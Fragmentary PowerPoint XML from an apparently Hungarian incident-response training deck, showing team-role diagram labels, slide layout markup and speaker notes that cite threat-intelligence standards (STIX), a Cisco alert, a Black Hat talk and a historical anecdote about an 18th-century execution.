            <a:gd name="adj" fmla="val 66678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2 HÁLÓZATOS KOLLÉGA (ROUTER, VLAN, VPN)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1339783" y="1960323"/>
        <a:ext cx="2548857" cy="980161"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D5A997C0-F415-C540-B26C-8101BED81136}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2940485"/>
          <a:ext cx="5228425" cy="980161"/>
        </a:xfrm>
        <a:prstGeom prst="trapezoid">
          <a:avLst>
            <a:gd name="adj" fmla="val 66678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3 SZERVERES KOLLÉGA</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="2000" kern="1200" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="2000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>(DC, LEVELEZÉS, ADATBÁZIS)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="914974" y="2940485"/>
        <a:ext cx="3398476" cy="98016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314950" y="9647238"/>
            <a:ext cx="11509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01.10.2012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608763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6A9AD3F-CD7B-426D-95D1-04CAD3082368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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="69637" name="Gruppieren 31"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="490538" y="169863"/>
            <a:ext cx="6118225" cy="266700"/>
            <a:chOff x="321317" y="6153149"/>
            <a:chExt cx="8498833" cy="371475"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Freeform 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1" noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7307384" y="6310141"/>
              <a:ext cx="1512766" cy="12161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34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793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80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3890202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Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag23.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.emf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541338" y="1012825"/>
            <a:ext cx="8151813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314950" y="9647238"/>
            <a:ext cx="11509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01.10.2012</a:t>
            </a:r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608763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14A85A3-C71D-439E-8E4B-F52EDAB04EC5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pic>
        <p:nvPicPr>
          <p:cNvPr id="35847" name="Picture 10" descr="TSY_Logo_3c_p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538" y="169863"/>
            <a:ext cx="1849437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83081375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eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:lnSpc>
        <a:spcPct val="90000"/>
      </a:lnSpc>
      <a:spcBef>
        <a:spcPct val="25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98450" indent="-155575" algn="l" defTabSz="457200" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:lnSpc>
        <a:spcPct val="90000"/>
      </a:lnSpc>
      <a:spcBef>
        <a:spcPct val="25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92125" indent="-192088" algn="l" defTabSz="457200" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:lnSpc>
        <a:spcPct val="90000"/>
      </a:lnSpc>
      <a:spcBef>
        <a:spcPct val="25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69925" indent="-176213" algn="l" defTabSz="457200" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:lnSpc>
        <a:spcPct val="90000"/>
      </a:lnSpc>
      <a:spcBef>
        <a:spcPct val="25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876300" indent="-204788" algn="l" defTabSz="457200" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:lnSpc>
        <a:spcPct val="90000"/>
      </a:lnSpc>
      <a:spcBef>
        <a:spcPct val="25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Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Breaking_wheel" TargetMode="Externa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Rectangle 3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hu-HU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="78809112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Rectangle 3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hu-HU" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18888482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Rectangle 3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hu-HU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="hu-HU" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18613694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Rectangle 3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hu-HU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="hu-HU" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9181750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Rectangle 3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hu-HU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="hu-HU" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="511130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Rectangle 3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hu-HU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="hu-HU" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7012735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Rectangle 3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hu-HU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1378068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Rectangle 3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141288" marR="0" indent="-141288" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0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Nicolas Jacques Pelletier, highwayman</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="141288" marR="0" indent="-141288" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1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Murder, rape</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="it-IT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Executed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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April 25, 1792</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="it-IT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It</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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was</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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too</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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swift</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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and "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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clinically</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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effective</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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" to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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provide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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proper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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entertainment, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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compared</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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previous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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methods</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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such</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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hanging</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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death</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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-by-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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sword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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  <a:hlinkClick r:id="rId3" tooltip="Breaking wheel"/>
              </a:rPr>
              <a:t>breaking at the wheel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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. The public </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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even</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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called</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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out, "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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Bring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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back </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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our</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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wooden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="12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gallows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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!”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="it-IT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59540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Rectangle 3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US" altLang="hu-HU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>tools.cisco.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/security/center/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>viewAlert.x?alertId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>=855</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" dirty="0" err="1" smtClean="0"/>
              <a:t>www.oasis-open.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>/committees/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" dirty="0" err="1" smtClean="0"/>
              <a:t>tc_home.php?wg_abbrev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" dirty="0" err="1" smtClean="0"/>
              <a:t>cti</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="hu-HU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>IR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>folyamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>mondás</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>2004</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Blackhat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>konf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>: Kevin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Mandia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>youtu.be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>otWioDpphHQ</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>https://oasis-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>open.github.io</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>cti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>-documentation/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>stix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>compare#one-standard</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="hu-HU" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2137696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Rectangle 3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hu-HU" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14453093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Rectangle 3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US" altLang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>https://oasis-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" dirty="0" err="1" smtClean="0"/>
              <a:t>open.github.io</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" dirty="0" err="1" smtClean="0"/>
              <a:t>cti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>-documentation/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" dirty="0" err="1" smtClean="0"/>
              <a:t>stix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" dirty="0" err="1" smtClean="0"/>
              <a:t>compare#one-standard</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="hu-HU" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5503792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Rectangle 3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US" altLang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" dirty="0" err="1" smtClean="0"/>
              <a:t>www.sciencedirect.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>/science/article/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" dirty="0" err="1" smtClean="0"/>
              <a:t>pii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>/S0167404817300263</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>http://www.r00tsec.com/2014/12/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" dirty="0" err="1" smtClean="0"/>
              <a:t>cheatsheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>-reverse-engineering-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" dirty="0" err="1" smtClean="0"/>
              <a:t>malware.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="hu-HU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="hu-HU" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19344260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Rectangle 3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US" altLang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" dirty="0" err="1" smtClean="0"/>
              <a:t>www.sciencedirect.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>/science/article/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" dirty="0" err="1" smtClean="0"/>
              <a:t>pii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>/S0167404817300263</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>http://www.r00tsec.com/2014/12/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" dirty="0" err="1" smtClean="0"/>
              <a:t>cheatsheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>-reverse-engineering-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" dirty="0" err="1" smtClean="0"/>
              <a:t>malware.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="hu-HU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="hu-HU" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13639813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Rectangle 3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US" altLang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" dirty="0" err="1" smtClean="0"/>
              <a:t>www.sciencedirect.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>/science/article/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" dirty="0" err="1" smtClean="0"/>
              <a:t>pii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>/S0167404817300263</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="hu-HU" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4065202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TextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr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Rectangle 3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US" altLang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>IR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>folyamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>mondás</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>2004</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Blackhat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>konf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>: Kevin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Mandia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>youtu.be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>otWioDpphHQ</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="hu-HU" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="hu-HU" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13951726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3.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.emf"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag9.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1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4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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1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4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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1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4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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1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4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2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2" hidden="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3" descr="TSY_Logo_3c_n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5646738"/>
            <a:ext cx="3468688" cy="630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>
          <a:xfrm>
            <a:off x="304800" y="1674813"/>
            <a:ext cx="10869613" cy="1389062"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="7200" smtClean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</p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="3667125"/>
